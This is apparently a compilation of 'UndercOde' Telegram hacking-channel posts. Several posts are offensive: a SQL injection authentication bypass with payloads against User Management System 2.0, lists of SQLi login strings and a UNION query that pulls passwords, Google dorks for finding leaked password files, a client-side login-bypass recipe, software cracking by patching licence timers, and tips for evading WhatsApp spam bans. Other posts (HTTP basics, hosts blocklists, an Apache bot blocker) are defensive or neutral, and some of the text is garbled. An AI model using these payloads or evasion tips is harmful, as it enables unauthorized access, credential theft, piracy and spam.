send screansoats @UndercodeOfficial After logins to share more accounts

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 BUG : User Management System 2.0 - Authentication BypasS :✅VERIFIED BY Undercode :


1- Vulnerable code is here (admin login: /admin/index.php):

<?php
session_start();
include("dbconnection.php");
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE
username='$adminusername' and password='$pass'");
$num=mysqli_fetch_array($ret);
if($num>0)
{
$extra="manage-users.php";
$_SESSION['login']=$_POST['username'];
$_SESSION['id']=$num['id'];
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
else
{
$_SESSION['action1']="*Invalid username or password";
$extra="index.php";
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
}

2- We can bypass authentication with SQLi:

Bypass code (user and admin login panel):

Username: pentester' or'1'=1#
Password : pentester' or'1'=1#

Finally: There is a lot of SQLi input in this project. Like, login,
registration, forgot password ...



▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How bad Hackers they hack your website and dump data ?

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋:

1))SQL Injection
SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.

When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.

🦑 The Simple SQL Injection Hack

In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.

Suppose we enter the following string in a Username field:

' OR 1=1

double-dash-txt.png
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:

SELECT * FROM users WHERE username = ?USRTEXT '
AND password = ?PASSTEXT?

...where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.

So entering `OR 1=1 -- as your username, could result in the following actually being run:

SELECT * FROM users WHERE username = ?' OR 1=1 -- 'AND password = '?

Two things you need to know about this:
['] closes the [username] text field.

'

double-dash-txt.png
' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE username = '' OR 1=1

1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.

Let's hope you got the gist of that, and move briskly on.

Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank, evidently.

username field examples:

admin'--
') or ('a'='a
") or ("a"="a
hi" or "a"="a
... and so on.

2) Backdoor Injection- Modules, Forums, Search etc.
Hacking web forms is by no means limited exclusively to login screens. A humble search form, for instance, is necessarily tied to a database, and can potentially be used to amend database details. Using SQL commands in search forms can potentially do some extremely powerful things, like calling up usernames and passwords, searching the database field set and field names, and amending same. Do people really get hacked through their search forms? You better believe it. And through forums, and anywhere else a user can input text into a field which interacts with the database. If security is low enough, the hacker can probe the database to get names of fields, then use commands like INSERT INTO, UNION, and so forth to get user information, change product prices, change account settings/balances, and just about anything else... depending on the security measures in place, database architecture and so on

3) Automated Injection
There are tools to automate the process of SQL Injection into login and other fields. One hacker process, using a specific tool, will be to seek out a number of weak targets using Google (searching for login.asp, for instance), then insert a range of possible injection strings (like those listed above, culled from innumerable Injection cheat-sheets on the Web), add a list of proxies to cover his movements, and go play XBox while the program automates the whole injection process.

4) Remote Injection
This involves uploading malicious files to inject SQL and exploit other vulnerabilities. It's a topic which was deemed beyond the scope of this report, but you can view this PDF if you'd like to learn more.

5) SQL Injection in the Browser Address Bar
Injections can also be performed via the browser address bar. I don't mean to have a pop at Microsoft, but when it comes to such vulnerabilities, HTTP GET requests with URLs following forums :

http://somesite.com/index.asp?id=10

> Try adding an SQL command to the end of a URL string like this, just for kicks:
http://somesite.com/index.asp?id=10 AND id=11

🦑The following illustrative string is from Imperva.

http://www.mydomain.com/products/products.asp?productid=123 UNION SELECT username, password FROM USERS

There are vast swathes of information on SQL Injection available, here are a couple of good sources:

GovernmentSecurity.org
SecurityDocs.com


6) Cross Site Scripting (XSS)
XSS or Cross Site Scripting is the other major vulnerability which dominates the web hacking landscape, and is an exceptionally tricky customer which seems particularly difficult to stop. Microsoft, MySpace, Google... all the big cahunas have had problems with XSS vulnerabilities. This is somewhat more complicated than SQL Injection, and we'll just have a quick look to get a feel for it.

XSS is about malicious (usually) JavaScript routines embedded in hyperlinks, which are used to hijack sessions, hijack ads in applications and steal personal information.

[%63%61%74%69%6f%6e%3d%274%74%70%3a%2f%2f%77%7...]


7) Stealing cookies is just the tip of the iceberg though -- XSS attacks through links and through embedded code on a page or even a bb post can do a whole lot more, with a little imagination.

XSS is mostly of concern to consumers and to developers of web applications. It's the family of security nightmares which keeps people like MySpace Tom and Mark Zuckerberg awake at night. So they're not all bad then, I suppose...

For additional resources search in telegram channel UndercodeTesting


@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Google Hacking can be used for hack website ?
instagram.com/UndercodeTesting

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋:

1) This is by far the easiest hack of all. It really is extraordinary what you can find in Google's index. And here's Newsflash #1: you can find a wealth of actual usernames and passwords using search strings.

Copy and paste these into Google:

inurl:passlist.txt
inurl:passwd.txt
...and this one is just priceless...
"login: *" "password= *" filetype:xls

2) Such strings return very random results, and are of little use for targeted attacks. Google hacking will primarily be used for finding sites with vulnerabilities. If a hacker knows that, say, SQL Server 2000 has certain exploits, and he knows a unique string pushed out by that version in results, you can hone in on vulnerable websites.

3) For specific targets Google can return some exceptionally useful information: full server configurations, database details (so a good hacker knows what kind of injections might work), and so forth. You can find any amount of SQL database dumps as well (fooling around with a Google hack while preparing this article, I stumbled across a dump for a top-tier CMS developer's website). And a vast amount more besides.

4) johnny.ihackstuff.com is the man to go to for Google hacks. One interesting one I toyed with invited me to the Joomla! install page for dozens of sites... people who had uploaded Joomla!, decided against installing it, and subsequently had either left the domain to rot, or else set a redirect on the page to, say, their Flickr account (in one case). Allowing anybody to walk in and run through the installer. Other query strings target unprotected email/IM archives, and all sorts of very sensitive information. What fun we can have!


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Authorization Bypass :


> Authorization Bypass is a frighteningly simple process which can be employed against poorly designed applications or content management frameworks. You know how it is... you run a small university and you want to give the undergraduate students something to do. So they build a content management framework for the Mickey Bags research department. Trouble is that this local portal is connected to other more important campus databases. Next thing you know, there goes the farm

> Authorization bypass, to gain access to the Admin backend, can be as simple as this:

1) Find weak target login page.

2) View source. Copy to notepad.

3) Delete the authorization javascript, amend a link or two.

4) Save to desktop.

> Open on desktop. Enter anything into login fields, press enter.
Hey Presto.
Here's a great video of a White Hat going through the authorization-bypass process on YouTube. This was done against a small university's website. It's a two-minute process. Note that he gets into the User 1 account, which is not the Admin account in this case. Is Admin User 1 on your User table?
@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Crack Software by Modifying DLL Files:
t.me/UnderCodeTestingOfficial

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :


1) Learn Assembly programming. In order to crack most software, you will need to have a good grasp on assembly, which is a low-level programming language. Assembly is derived from machine language, and each assembly language is specific to the type of computer you are using.

> Most assembly language is expressed through binary and hexadecimal.

2) Image titled Crack Software by Modifying DLL Files
Gather your tools. In order to examine and modify DLLs, you will need several different tools. W32DASM is a software disassembler that allows you to pick apart programs. SoftIce is a Windows debugging tool. You'll also want a good coding text editor, such as UltraEdit or Notepad++.


3) Start the program you want to crack with W32DASM. This will show you what DLL files are being loaded by the program. Use W32DASM to examine which functions are being called from the DLL.

4) Find the counter function. Many programs use a timer for copy protection, and when the timer runs out, the user is no longer able to access the program. The goal is to find this counter code, and then bypass it.

5) If the program you are cracking uses a different form of protection, you will need to look for that instead.

6) Set a break-point on the counter. Once you've isolated the counter function, set SoftIce to break when it is encountered. This will allow you to look at the exact code that is occurring when the counter function is called.

7) Change the counter code. Now that you've found the code for the counter function, you can change the code so that the counter never reaches the point where it shuts you out of the program. For example, you could make it so that the counter cannot count up to the break limit or you can bypass the counter by jumping over it.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Avoid Getting Banned on WhatsApp

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :


1) Have a real content, a survey that the person agreed with is different than a marketing message on a saturday night

2) Add every contact you will send a message to your contacts list

3) Send messages written in different ways, you could make a script that places spacebars randomly on your string AND include the person’s (first) name

4) Never use fixed times, always go for sending the first message, wait a random time between 30 ~ 60 seconds and then send the second message

5) It’s expected that you run Whatsapp Web on the same network of the primary app on your phone. If you have whatsapp (app) running on your real phone with you and whatsapp (web) on some cloud solution like AWS that is hosted far away from you, I’m sure you will be banned

6) Unless you know how to crack whatsapp’s number validation system very well (there are some tutorials), prefer to use physical devices other than emulators

7) A good proxy is a must, make sure that both phone and bot are on the same IP and that this IP matches with your contacts country

8) Always try to group contacts by their area code, Whatsapp expects a regular person to talk mostly with contacts that are within the same area of your phone number

9) Have a profile picture, this is not related to Whatsapp Bots Catcher® but sending a new message for someone not having a picture/name/status will elevate your chances of being manually tagged as spam

10) Don’t keep sending messages to people that have already blocked you, I suggest checking before sending the message if the contact is blocked

11) Even though you will be able to send messages to contacts that doesn’t have whatsapp, you must never do that. Always check if your contacts have whatsapp before sending a message

12) There are some special numbers that I believe are under tests from whatsapp, if you send a message to 00@c.us a official whatsapp advertising account will get the message, it's like selling cocaine to the police

13) Don’t let your code make requests that a regular Whatsapp Web wouldn’t, for example reaching a number without @c.us, some errors are logged as well

14) Send “seen” confirmation to messages or disable it on Whatsapp

15) don’t instantly reply to messages, a nice wait time is a random value from 5 to 10 seconds

16) It’s a good practice when sending messages to open the chat, mark as read, send a "typing..." status, wait a few seconds and then send the message

17) Have a new browser everytime you open Whatsapp Web,mean, don’t keep cache. It’s a real pain to always have to enter the QR code but unless you have only one account and the bot isn’t overloaded it’s for the best

18) Avoid sending links that were previously marked as spam on Whatsapp or non-HTTPS. A URL shortener is a good idea

19) It’s really bad if you send messages 24/7 without giving it some time to wait. Random belays between messages are not enough, send a resonable amount of messages keeping in mind your conversions rate, for exemple: for one hour send a maximum of 4 messages per contact that have replied to your message, stop sending messages for one hours, then start again. Again, don’t send messages without stopping for a while between every “package”

20) Send only one short message when starting a conversation, one should not send long texts or multiple messages without the user conscenting

21) If you have to send multiple messages as a reply, send the first one, wait a few seconds and then go for the second message. You can still get banned if it’s too fast even though you’ve waited some seconds to reply.
Always try to get everything inside one message

22) Don’t send different messages to different people at the same time, make it one-way only.

23) void using prefixes for messages

24) Do not use yowsup-cli

25) Become online to send messages


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WhatsApp general encryption Lastest Update 2019- 2020 by UndercOde
Twitter.com/UndercodeNews

🦑Ⓛⓔⓣⓢ Ⓢⓣⓐⓡⓣ

1) Types of public key

> Identity key pair - Long-term Curve25519 key pair,
generated during installation.

2) Signed Pre Key - A medium term Curve25519 pair of keys,
generated during installation, signed by the identity key, and rotated
on a periodic timed basis.

3) A pre-Keys time - a queue of key pairs for a Curve25519
using the time, generated during installation, and replenished as necessary.

🦑 Session Key Types

> Root Key - A 32-byte value that is used to create string keys.

>Keychain - A value of 32 bytes that is used to create
Keys messages .

>Key Message - A value of 80 bytes that is used to encrypt
content messages . 32 bytes are used to obtain an AES-256 key, 32 bytes for an
>HMAC-SHA256 key, and 16 bytes for an intravenous injection.

🦑client registration

1)At the time of registration, a WhatsApp client transmits its public identity
Key, public key signed Pre (with its signature), and a public batch
A time of pre Keys for the server.

2) The server stores these WhatsApp
public keys associated with the user ID. In no time the
WhatsApp server has access to any of the clients private keys.

🦑To establish a session:

1) The client that starts ("initiator") requests the public key identity,
previously signed public key, and a single one-time public Pre key
for the recipient.

2) The server returns the requested public key values. Once
Pre Key is only used once, so it is removed from server storage
after it has been requested. If the recipient's last batch of one-time
Pre keys has been consumed and the recipient has not replenished
them, they will be returned without a single key time previously.

3) The initiator saves the recipient's Key Identity as Irecipient, the
Pre Key Sign as Srecipient, and the one-time as Pre
Orecipient Key .

4) The initiator generates an ephemeral Curve25519 key pair, Einitiator.

5) The initiator loads its own identity key as Iinitiator.

6) The initiator calculates a master secret as master_secret =
ECDH (Iinitiator, Srecipient) || ECDH (Einitiator, Irecipient) ||
ECDH (Einitiator, Srecipient) || ECDH (Einitiator, Orecipient).
If there is no pre Key time, the final ECDH is skipped.

7) The initiator uses HKDF to create a string root key and
master_secret keys .
Receiving session configuration
After the construction of a long-term encryption session, the initiator can immediately

8) start sending messages to the recipient, even if the recipient is not online.
Until the recipient responds, the initiator includes the information (in the
header of all sent messages) that the receiver requires to build a corresponding
session. This includes Einitiator of the initiator and Iinitiator.
When the recipient receives a message that includes session

@UndercOdeTestingOfficial

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Trity Exploite Tool top 2019:Emulator Escape
>Trinity is the third public jailbreak for the PS Vita™, which supports the latest firmwares 3.69 and 3.70. The exploit chain consists of three stages: the MIPS Kernel Exploit, the PSP Emulator Escape and the ARM Kernel Exploit.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Download and install qcma and psvimgtools.
> https://codestation.github.io/qcma/
>https://github.com/yifanlu/psvimgtools/releases

2) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.

3) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PS Vita System -> PC, and after that you select Applications. Finally select PSP™/Other and click on the game that you want to turn into the Trinity exploit. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates.

4) Transfer the game over to your computer by clicking on Copy on your PS Vita. After copying, you go to the folder /Documents/PS Vita/PGAME/xxxxxxxxxxxxxxxx/YYYYZZZZZ on your computer, where xxxxxxxxxxxxxxxx is some string corresponding to your account ID and YYYYZZZZZ is the title id of the game that you've just copied over. You can look at the image at YYYYZZZZZ/sce_sys/icon0.png to verify that it is indeed your chosen game. Furthermore, the YYYYZZZZZ folder should contain these folders: game, license and sce_sys.

5) Before you attempt to modify the backup, you should make a copy of it. Just copy YYYYZZZZZ somewhere else, such that if you fail to follow the instructions, you can copy it back and retry.

6) Insert the xxxxxxxxxxxxxxxx string here. If the AID is valid, it will yield a key that you can now use to decrypt/re-encrypt your game.

7) Decrypt the game backup by executing the following command in your command line/terminal (make sure you're in the right working directory. On Windows you can open the terminal in the current working directory by typing in cmd in the path bar of the file explorer. Also, if you haven't installed psvimgtools yet, then just place them in the YYYYZZZZZ folder):

> psvimg-extract -K YOUR_KEY game/game.psvimg game_dec
If done correctly, you should see an output like this:

> creating file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/EBOOT.PBP (x bytes)...
>creating file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/__sce_ebootpbp (x bytes)...
all done.

8) Download Trinity and copy the PBOOT.PBP file to game_dec/ux0_pspemu_temp_game_PSP_GAME_YYYYZZZZZ/PBOOT.PBP (the files EBOOT.PBP, __sce_ebootpbp and VITA_PATH.txt should exist in this folder). If PBOOT.PBP does already exist there, just overwrite it.
> https://github.com/TheOfficialFloW/Trinity/releases/download/v1.0/PBOOT.PBP

9) Now re-encrypt the backup similar to above by typing this in your command line/terminal:

> psvimg-create -n game -K YOUR_KEY game_dec game
If done correctly, you should see an output like this:

>adding files for ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/EBOOT.PBP (x bytes)...
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/PBOOT.PBP (x bytes)...
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/__sce_ebootpbp (x bytes)...
created game/game.psvimg (size: x, content size: x)
created game/game.psvmd

10) Remove the game_dec folder (and PSVimg tools if copied here) and

11) select Refresh database in qcma settings.

12) Now you need to copy back the modified backup to your PS Vita: Launch Content Manager on your PS Vita and connect it to your computer (if it's already open, just go back to the first menu), where you then need to select PC -> PS Vita System, and after that you select Applications. Finally select PSP™/Other and click on the modified game. Perform the copy operation and exit Content Manager.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HTTP protocol and work with headers guide :
twitter.com/UnderodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> HTTP protocol
How WWW (World Wide Web, Web) works in a nutshell:

1) the user's browser (client) sends a request to the server with the site address (URL);

2) the server receives this request and gives the client the content it needs.

3) In other words, the entire modern web is built on a model of client-server interaction. And to make this whole process possible, a universal protocol language is needed that both the server and browser will understand. There is such a protocol, but it is called HTTP.

🦑 How HTTP works, and why do we need to know ? 🦑

> You can program in PHP without knowing the HTTP protocol, but there are a number of situations where you need to know how the web server works to solve problems. After all, PHP is, first of all, a server programming language.

> The HTTP protocol is very simple and consists essentially of two parts:

Request / response headers
Request / Response Bodies.
First comes a list of headers, then an empty string, and then (if any) the body of the request / response.

> Both the client and the server can send headers and the response body to each other, but in the case of the client, the available headers will be one, and the server will be different. Let's take a step-by-step look at how the work using the HTTP protocol will look in the case when the user wants to download the main page of the Vkontakte social network.

1) The user's browser establishes a connection with the vk.com server and sends the following request:

GET / HTTP / 1.1
Host: vk.com

2) The server accepts the request and sends a response:

HTTP/1.1 200 OK
Server: Apache

<html>
<head>
<title>ВКонтакте</title>
</head>
<!-- остальной контент страницы ниже -->

3) The browser accepts the response and displays the finished page

> Most of all, we are interested in the very first step, where the browser initiates a request to the vk.com server.
Let us consider in more detail what is happening there. The first line of the query defines several important parameters, namely:

> The method by which the content will be requested;
Page address;
Protocol version.
GETIs a method (verb) that we use to access the specified page.
GETis the most commonly used method because it tells the server that the client just wants to read the specified document. But besides GETthere are other methods, we will consider one of them in the next section.

> After the method there is an indication of the page address - URI (universal resource identifier). In our case, we request the main page of the site, so just a slash is used /.
The last in this line is the protocol version and almost always it will beHTTP/1.1

> After a line indicating the main parameters, a list of headers always fo1llows, which give the server additional useful information: the name and version of the browser, language, encoding, caching parameters, and so on.

> Among all these headers that are transmitted during each request, there is one mandatory and most important one - this is the heading Host. It determines the domain address that the client browser requests.

> Having received a request, the server searches for a site with a domain from the header Host, as well as the specified page.
If the requested site and page are found, a response is sent to the client:
HTTP/1.1 200 OK

> This answer means that everything is fine, the document is found and will be sent to the client.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 collection of android Exploits and Hacks
instagram.com/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/sundaysec/Android-Exploits.git

> Recommend you grab exploitpack latest version

wget https://github.com/juansacco/exploitpack/archive/master.zip

2) Extract then Navigate into the folder and type:

3) java -jar ExploitPack.jar

4) Load the exploits

🦑Common Tools(In mobile Exploits):

> SSH

> VNC server

> A compiler (gcc / agcc)

> Android SDK (adb!)

> XCode

> Jailbroken iDevice

> Rooted Android Device


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Simple Linux Bash Server Administration Scripts

> FTP Backup Script For any linux server which backs up critical system files and folders and also all your MySQL Databases.

> The script uses the NCFTP client, it deletes backups older than X days and also emails you with a success or failure message.


🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/mitchellkrogza/linux-server-administration-scripts

2) cd linux-server-administration-scripts

3) chmod 777 ftpbackup.sh

4) ./ftpbackup.sh

That s all

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

🦑The Ultimate Unified Hosts file
t.me/UnderCodeTesting
> for protecting your network, computer, smartphones and Wi-Fi devices against millions of bad web sites.

> Protect your children and family from gaining access to bad web sites and protect your devices and pc from being infected with Malware or Ransomware.

> Without any Paid services !

🦑DAILY UPDATED !!!!!!!!!!!🦑

𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/mitchellkrogza/Ultimate.Hosts.Blacklist

2) AUTOMATe Run:

> cd installer-windows

3) Now

> Press ⊞ Win+R. This opens the Run dialog.

4) If you need to run the batch file as an administrator, see this method instead.

> go to file then

5) OPEn cmd & Click Run as Administrator

> windows-install-hosts.bat

6 ) MANUAL

Now its not installing like a normal script so you need to edit some in your ip & dns / adapter & Hosts settings


> A hosts file, named hosts (with no file extension), is a plain-text file used by all operating systems to map hostnames to IP addresses.

> In most operating systems, the hosts file is preferential to DNS. Therefore if a domain name is resolved by the hosts file, the request never leaves your computer.

> Having a smart hosts file goes a long way towards blocking malware, adware, ransomware, porn and other nuisance web sites.

> A hosts file like this causes any lookups to any of the listed domains to resolve back to your localhost so it prevents any outgoing connections to the listed domains.

🦑For example, to drop all requests to certain domains or servers, adding lines to your hosts file as below will achieve this for you. You can create your own custom hosts or simply use ours which covers you for well over 1 million bad domains and web sites out there.

# Block Bad Domains and Servers with Hosts File
0.0.0.0 doubleclick.net
0.0.0.0 18chinese.com
0.0.0.0 gatekeeper.tss.net
0.0.0.0 www.gatekeeper.tss.net
0.0.0.0 cdn.gatekeeper.tss.net
0.0.0.0 youporn.com
0.0.0.0 www.youporn.com
0.0.0.0 x-lime.net
0.0.0.0 www.x-lime.net
# etc ... etc .... etc ...

3) So go to hosts file
example on windows :

> C:\Windows\System32\drivers\etc\hosts

4) open it in any text editor app example Notpad
> change hosts by adding this repo hosts

Or

🦑For linux

1) hosts.deny

is a plain-text file for Linux/Unix based operating systems only which blocks a list of IP addresses on the outside of your network from gaining any access to your computer.

2) A hosts.deny file will not work on a Windows operating system.

3) same in Linux You can modifie hosts file by opening in leafpad example

🦑 Or Automate run :

1) cd Installer-Linux

2) Chmod 777 linux-hosts-installer.sh

3) ./ linux-hosts-installer.sh

E N J O Y NO NEED FOR PAID SERVICES FOR BLOCKING MALWARES ADDS......


WRITTEN BY @UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

🦑2019 Phishing Database Tested by UndercOde:
Phishing Domains, urls websites and threats database. We use the PyFunceble testing tool to validate the status of all known Phishing domains and provide stats to reveal how many unique domains used for Phishing are still active.
t.me/UnderCodeTesting


🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:


🦑Phishing Domaines Status

1) Active :

>Database On
https://raw.githubusercontent.com/mitchellkrogza/Phishing.Database/master/phishing-domains-ACTIVE.txt

2) Anactive :

> https://raw.githubusercontent.com/mitchellkrogza/Phishing.Database/master/phishing-domains-INACTIVE.txt

3) Invalid :

> https://github.com/mitchellkrogza/Phishing.Database

🦑Phishing Links Status

1)Active :

https://raw.githubusercontent.com/mitchellkrogza/Phishing.Database/master/phishing-links-ACTIVE.txt

2) Inactive:

> https://raw.githubusercontent.com/mitchellkrogza/Phishing.Database/master/phishing-links-INACTIVE.txt

3) Invalid :

> https://raw.githubusercontent.com/mitchellkrogza/Phishing.Database/master/phishing-links-INVALID.txt

🦑 All the following HTTP status codes we regard as ACTIVE or still POTENTIALLY ACTIVE.

🦑ACTIVE HTTP Codes

- 100
- 101
- 200
- 201
- 202
- 203
- 204
- 205
- 206
🦑 POTENTIALLY ACTIVE HTTP Codes
- 000
- 300
- 301
- 302
- 303
- 304
- 305
- 307
- 403
- 405
- 406
- 407
- 408
- 411
- 413
- 417
- 500
- 501
- 502
- 503
- 504
- 505
🦑POTENTIALLY INACTIVE HTTP Codes
- 400
- 402
- 403
- 404
- 409
- 410
- 412
- 414
- 415
- 416

🦑Criminals planting Phishing links often resort to a variety of techniques like returning a variety of HTTP failure codes to trick people into thinking the link is gone but in reality if you test a bit later it is often back.


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

🦑 All in One

> Apache Block Bad Bots
> (Referer) Spam Referrer Blocker,
> Vulnerability Scanners, Malware, Adware, Ransomware, Malicious Sites,
> Wordpress Theme Detectors and Fail2Ban Jail for Repeat Offenders
instagram.com/UnderCodeTesting
🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:


1) clone https://github.com/mitchellkrogza/apache-ultimate-bad-bot-blocker

2) COPY THE GLOBALBLACKLIST.CONF FILE FROM THE REPO $APACHE_CONF is generally located at /etc/apache2 or /etc/httpd depending on OS

3) Copy the contents of globalblacklist.conf into your $APACHE_CONF/custom.d folder. e.g. /etc/apache2/custom.d on Ubuntu/Debian /etc/httpd on RHEL/centos You need to create this folder.

4) The following directions use /etc/apache2 as an example.

> sudo mkdir /etc/apache2/custom.d

> sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/globalblacklist.conf -O /etc/apache2/custom.d/globalblacklist.conf

5) If your Linux distribution does not have wget you can replace the wget commands using curl as follows:

> curl -sL https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/globalblacklist.conf -o /etc/apache2/custom.d/globalblacklist.conf

6) Please do NOT ever use 127.0.0.1 as a whitelisted IP address in whitelist-ips.conf it will cause the blocker to stop functioning.

> copy the whitelist-ips.conf file into that folder

7) sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/whitelist-ips.conf -O /etc/apache2/custom.d/whitelist-ips.conf

8) copy the whitelist-domains.conf file into the same folder

9) sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/whitelist-domains.conf -O /etc/apache2/custom.d/whitelist-domains.conf

10) Use nano, vim or any other text editor to edit both whitelist-ips.conf and whitelist-domains.conf to include all your own domain names and IP addresses that you want to specifically whitelist from the blocker script.

11) copy the blacklist-ips.conf file into that folder

> sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/blacklist-ips.conf -O /etc/apache2/custom.d/blacklist-ips.conf

12) copy the bad-referrer-words.conf file into that folder

> sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/bad-referrer-words.conf -O /etc/apache2/custom.d/bad-referrer-words.conf

13) Allows you to add your own custom list of user agents with this new include file.

> copy the blacklist-user-agents.conf file into that folder

> sudo wget https://raw.githubusercontent.com/mitchellkrogza/apache-ultimate-bad-bot-blocker/master/Apache_2.2/custom.d/blacklist-user-agents.conf -O /etc/apache2/custom.d/blacklist-user-agents.conf

14) INCLUDE THE GLOBALBLACKLIST.CONF

Include the globalblacklist.conf file in the beginning of a directory block just after your opening Options statements and before the rest of your host config example below. Remove the "<<<<<< This needs to be added" part

<VirtualHost *:80>
ServerName local.dev
DocumentRoot /var/www/html
ErrorLog /tmp/error.log

<Directory "/var/www/html">
Options +Includes
Options +FollowSymLinks -Indexes
Include custom.d/globalblacklist.conf
</Directory>
</VirtualHost>

15) You can include globalblacklist.conf globally (for all virtual hosts) if you put the following configuration after virtual host configuration.

16) Do an Apache2 Config Test

